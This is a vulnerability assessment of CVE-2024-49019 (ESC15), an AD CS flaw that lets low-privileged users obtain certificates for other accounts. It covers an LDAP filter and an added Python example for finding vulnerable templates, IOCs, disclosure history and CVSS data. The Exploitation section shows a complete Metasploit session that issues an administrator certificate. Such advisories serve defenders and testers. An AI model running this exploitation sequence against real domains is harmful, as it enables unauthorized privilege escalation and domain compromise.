Attacker Value
High
(1 user assessed)
Exploitability
High
(1 user assessed)
User Interaction
None
Privileges Required
Low
Attack Vector
Local

CVE-2024-49019

Disclosure Date: November 12, 2024

Description

Active Directory Certificate Services Elevation of Privilege Vulnerability

Ratings
  • Attacker Value
    High
  • Exploitability
    High
Technical Analysis

This vulnerability is also known as ESC15 and EKUwu.

Overview

Microsoft’s Active Directory Certificate Services (AD CS) is affected by a vulnerability whereby certificate templates using schema version 1 allow the requester to specify the application policies, in the form of OIDs, to be included in the signed certificate. When combined with the ability to specify the Certificate Request Agent OID (1.3.6.1.4.1.311.20.2.1), an attacker can request authentication certificates for any user using the built-in, default User template. While the built-in, default WebServer template is technically vulnerable to this flaw, its default permissions restrict enrollment to the privileged Domain Admins and Enterprise Admins groups. An attacker would need to identify a published certificate template that uses schema version 1 and that they have the necessary permission to enroll with. Such templates are relatively easy to identify with the following LDAP query, followed by inspecting the enrollment permissions of each result.

(&
    (objectclass=pkicertificatetemplate)
    (!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))
    (|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))
    (pkiextendedkeyusage=*)
    (mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1)
    (mspki-template-schema-version=1)
)
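
An added example (not part of this assessment, nor code from Certipy or Metasploit) that applies the same conditions as the LDAP filter above to template records and then keeps only the candidates a given principal can enroll in. The template records, the `enroll` field standing in for the template ACL, and the function names are constructed for illustration; the flag values are modelled on the default templates.

```python
# Constructed sample records (not from a live domain); flag values modelled on defaults.
# Bits the LDAP filter tests via LDAP_MATCHING_RULE_OR 1.2.840.113556.1.4.804 (any bit set).
CT_FLAG_PEND_ALL_REQUESTS = 0x2          # msPKI-Enrollment-Flag: manager approval required
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1  # msPKI-Certificate-Name-Flag

def is_esc15_candidate(tmpl: dict) -> bool:
    """Same predicate as the LDAP filter: schema v1, requester supplies the
    subject, no manager approval, no RA signature required, at least one EKU."""
    if tmpl.get("msPKI-Template-Schema-Version") != 1:
        return False
    if tmpl.get("msPKI-Enrollment-Flag", 0) & CT_FLAG_PEND_ALL_REQUESTS:
        return False
    if tmpl.get("msPKI-RA-Signature", 0) != 0:  # absent attribute counts as 0
        return False
    if not tmpl.get("pKIExtendedKeyUsage"):
        return False
    return bool(tmpl.get("msPKI-Certificate-Name-Flag", 0)
                & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)

def exposed_templates(templates: list, principal_groups: set) -> list:
    """Second step from the text: keep only candidates the given principal can
    enroll in. 'enroll' is a constructed stand-in for the template's ACL."""
    return [t["cn"] for t in templates
            if is_esc15_candidate(t) and t.get("enroll", set()) & principal_groups]

SAMPLE_TEMPLATES = [
    {"cn": "WebServer", "msPKI-Template-Schema-Version": 1, "msPKI-Enrollment-Flag": 0,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"],
     "msPKI-Certificate-Name-Flag": 0x1, "enroll": {"Domain Admins", "Enterprise Admins"}},
    {"cn": "User", "msPKI-Template-Schema-Version": 1, "msPKI-Enrollment-Flag": 0x29,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
     "msPKI-Certificate-Name-Flag": 0xA6000000, "enroll": {"Domain Users"}},
    {"cn": "ESC15-Test", "msPKI-Template-Schema-Version": 1, "msPKI-Enrollment-Flag": 0,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"],  # RA signature attribute absent
     "msPKI-Certificate-Name-Flag": 0x1, "enroll": {"Domain Users"}},
    {"cn": "Approved-Only", "msPKI-Template-Schema-Version": 1, "msPKI-Enrollment-Flag": 0x2,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"],
     "msPKI-Certificate-Name-Flag": 0x1, "enroll": {"Domain Users"}},
    {"cn": "Modern-v2", "msPKI-Template-Schema-Version": 2, "msPKI-Enrollment-Flag": 0,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"],
     "msPKI-Certificate-Name-Flag": 0x1, "enroll": {"Domain Users"}},
]

if __name__ == "__main__":
    print("Reachable by Domain Users:", exposed_templates(SAMPLE_TEMPLATES, {"Domain Users"}))
    print("Reachable by Domain Admins:", exposed_templates(SAMPLE_TEMPLATES, {"Domain Admins"}))
```

The User template drops out because its name flags do not let the enrollee supply the subject, and WebServer only appears for the admin groups, matching the text's observation about its default permissions.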

IOCs

When certificates are issued, a record is kept on the CA. An administrator can view issued certificates using certsrv.msc by navigating to the CA and selecting “Issued Certificates”. Look for the certificate template that is vulnerable and inspect the instances in which it was issued, as these could indicate that a malicious user has leveraged this flaw.

Disclosure

The vulnerability was first hinted at on the X (formerly Twitter) social media platform by the members of the TrustedSec team who discovered it. Through private conversations, the details began to slowly leak to a larger audience. The details became public on October 7th, 2024 when dru1d-foofus opened a pull request containing a functioning PoC to the popular Certipy repository. The next day, TrustedSec released a blog post and detailed writeup regarding the vulnerability. At this time it was unclear whether or not Microsoft would issue a CVE for the vulnerability; most ESC flaws have not had CVEs issued to identify them. On November 12th, 2024 Microsoft released a patch for this flaw, which they issued as CVE-2024-49019.

Exploitation

This vulnerability is exploitable with Metasploit version 6.4.32 using the icpr_cert module and the ADD_CERT_APP_POLICY datastore option.

msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
RHOSTS => 172.30.239.85
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
SMBUser => normaluser
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain COLLALABS1
SMBDomain => COLLALABS1
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
SMBPass => normalpass
msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA collalabs1-SRV-ADDS01-CA
CA => collalabs1-SRV-ADDS01-CA
msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC15-Test
CERT_TEMPLATE => ESC15-Test
msf6 auxiliary(admin/dcerpc/icpr_cert) > set ADD_CERT_APP_POLICY 1.3.6.1.4.1.311.20.2.1
ADD_CERT_APP_POLICY => 1.3.6.1.4.1.311.20.2.1
msf6 auxiliary(admin/dcerpc/icpr_cert) > run
[*] Running module against 172.30.239.85
[*] 172.30.239.85:445 - Requesting a certificate...
[+] 172.30.239.85:445 - The requested certificate was issued.
[*] 172.30.239.85:445 - Certificate UPN: administrator@collalabs1.local
[*] 172.30.239.85:445 - Certificate Policies:
[*] 172.30.239.85:445 -   * 1.3.6.1.4.1.311.20.2.1 (Certificate Request Agent)
[*] 172.30.239.85:445 - Certificate stored at: /home/normaluser/.msf4/loot/20241009172714_default_172.30.239.85_windows.ad.cs_659672.pfx
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/icpr_cert) >

CVSS V3 Severity and Metrics
Base Score:
7.8 High
Impact Score:
5.9
Exploitability Score:
1.8
Vector:
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Local
Attack Complexity (AC):
Low
Privileges Required (PR):
Low
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • microsoft

Products

  • windows server 2008
  • windows server 2008 r2
  • windows server 2012
  • windows server 2012 r2
  • windows server 2016
  • windows server 2019
  • windows server 2022
  • windows server 2022 23h2
  • windows server 2025
